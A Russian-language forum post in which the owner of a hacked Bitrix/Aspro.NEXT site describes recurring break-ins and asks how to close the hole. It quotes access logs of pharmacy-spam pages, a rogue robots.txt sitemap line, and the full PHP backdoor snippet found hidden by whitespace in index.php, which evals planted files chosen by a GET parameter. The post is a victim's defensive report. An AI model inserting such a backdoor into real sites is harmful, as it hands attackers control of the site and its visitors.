Устал бороться. Битрикс – решето, сплошные разочарования! Стоит не дешево, а проблем получаешь вагон.
Одну проблему закроешь, вторая следом возникает. Битрикс + Аспро.NEXT – чего только не было за историю работы сайта.
Начиная от редиректов ?goto=, заканчивая шелами, и появлением новых директорий со скриптами в корне сайта. Обновления особо не помогают. Дверь закроешь, они в окно.
Сайт похоже в какой-то спам базе – устал бороться с ботами. Но очередной взлом добил окончательно!
Периодически смотрю логи, и вот опять – вижу огромное количество - обращений, GET запросов типа:
[CODE]/?ko=dejstvie_sialis_na_muzhskoj_organizm.php HTTP/1.0" 200 36384 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
[/CODE]
При переходе по ссылке на моем сайте, с моим доменным именем открываются страницы другого сайта, каталог препаратов для импотентов: виагрой и прочей фигней.
Началось все с этого:
[CODE]127.0.0.1 - - [12/Feb/2024:02:10:43 +0000] "GET /lib/tools/coc/ HTTP/1.0" 200 36240 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
127.0.0.1 - - [12/Feb/2024:02:10:43 +0000] "GET /lib/tools/coc/ HTTP/1.0" 200 36240 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
127.0.0.1 - - [12/Feb/2024:02:10:44 +0000] "GET /lib/tools/coc/ HTTP/1.0" 200 36240 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"[/CODE]
Обнаружил новую директорию с /lib/ - в корне сайта, с большим количеством PHP - файлов, страниц данного левого сайта.
Как подсадили, не догадываюсь. Убрал.
Понимаю, что просто убрать мало, так как сама проблема окончательно не решена, дыра не закрыта.
Прошу совета! Как решить проблему окончательно? Куда смотреть?
PS: Ещё нашел в файле index.php в корне, сразу после открывающей директивы <? вставку кода:[CODE]error_reporting(0); ini_set('display_errors', 'Off'); if(isset($_GET['ko'])) { header('Content-Type: text/html; charset=utf-8');
$p=array_pop(@preg_split("!\/!",$_GET['ko'])); echo eval/**/('?>'.join("",file("lib/tools/coc/$p")).'<?'); die; }?>[/CODE]
Причем сдвинута в право с большим количеством пробелов, что бы при открытии файла была не заметна.
PS: Ещё в файл robots.txt добавили строку:[CODE]Sitemap: https://my-site.ru/lib/tools/coc/sitemap.xml
[/CODE]